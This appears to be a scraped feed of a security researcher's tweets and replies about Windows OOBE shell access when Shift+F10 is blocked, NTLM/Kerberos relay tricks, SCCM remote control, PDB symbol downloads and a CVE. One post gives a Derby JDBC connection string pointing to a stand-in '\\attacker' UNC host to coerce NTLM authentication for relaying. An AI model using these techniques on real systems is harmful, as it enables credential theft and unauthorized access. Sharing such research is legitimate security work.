@_JohnHammond Thanks for the mention John, great video! To add a bit of context for all: My writeup focuses on a scenario in which organisations intentionally blocked Shift+F10 by adding the DisableCMDRequest.tag file and it's possible to bypass this protection with Win+R
An alternative to Shift+F10 to open an administrative command prompt during the Windows initial setup and Out-of-Box-Experience (OOBE) -- video showcase of @_bka_ 's newfound trick to revive a simple method for backdoors and unintended access: https://t.co/R7soflOx1h
The old and well-known way to spawn a shell in Windows OOBE is the Shift+F10 hotkey. But did you know there is another way, even when Shift+F10 is disabled? You could find more details in the blog post (link in the comment).
#infosec#oobe#Intune#Windows
@albinowax Very nice, thanks James. Couldn't the additional scan checks also be included as part of the built-in templates for the scan launcher? Or would this create too much load where it might not be necessary?
If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for NTLM relaying.
Example connection string:
jdbc:derby://<target>:1527/\\attacker\foobar;create=false
#redteam
@guhe120@msftsecresponse That would be interesting to know. My latest experience is one of the "not a security boundary" responses, which clearly is not the case for my issue
OK, I promise to stop spamming about relays with NTLM/Kerberos 😅. But if you're a member of the Distributed COM or Performance Log group, these juicy CLSIDs let you trigger remotely machine authentication of any computer, including DCs, and relay DCOM -> HTTP, SMB… 👇
Highly recommend this blog post of @nv1t in which he demonstrates how flawed the Kekz headphones are, by reversing the hardware and firmware of this product.
#infosec#reverseengineering
I've looked into the Kekz Headphones for children approx a year ago. I finally published the blog post about the crypto of the audio files and how the cookies operate.
There is even some customer data disclosure involved.
https://t.co/N8XOAxbGUB
Ever found the Remote Control service of SCCM/MECM on TCP Port 2701? Turns out there is no easy way to check logins against the service on Linux where you could not use CmRcViewer.exe. So I wrote a script that could do it. It's available on https://t.co/hU4XxGIMWQ
#infosec
This is all we need to construct the URL. Name of the PDB (in this example ipconfig.pdb), UUID and age:
wget https://t.co/Rhf86xVlmU
Please note that the last digit, 1, behind the UUID corresponds to the age value. That's it, the symbols are going to be downloaded.
Downloading symbols for .exe files is easy with tools like symchk, Windbg, IDA or Ghidra. But how to do it manually, for example on Linux with only few tools available?
First we need the UUID of the PDB and its age. We could use objdump for this:
@f4rmpoet Exactly. So my assumption is this: cve-2024-38063 is triggered by sending a large number of faulty Ipv6Options that are summed up incorrectly by the ICMP error handling routine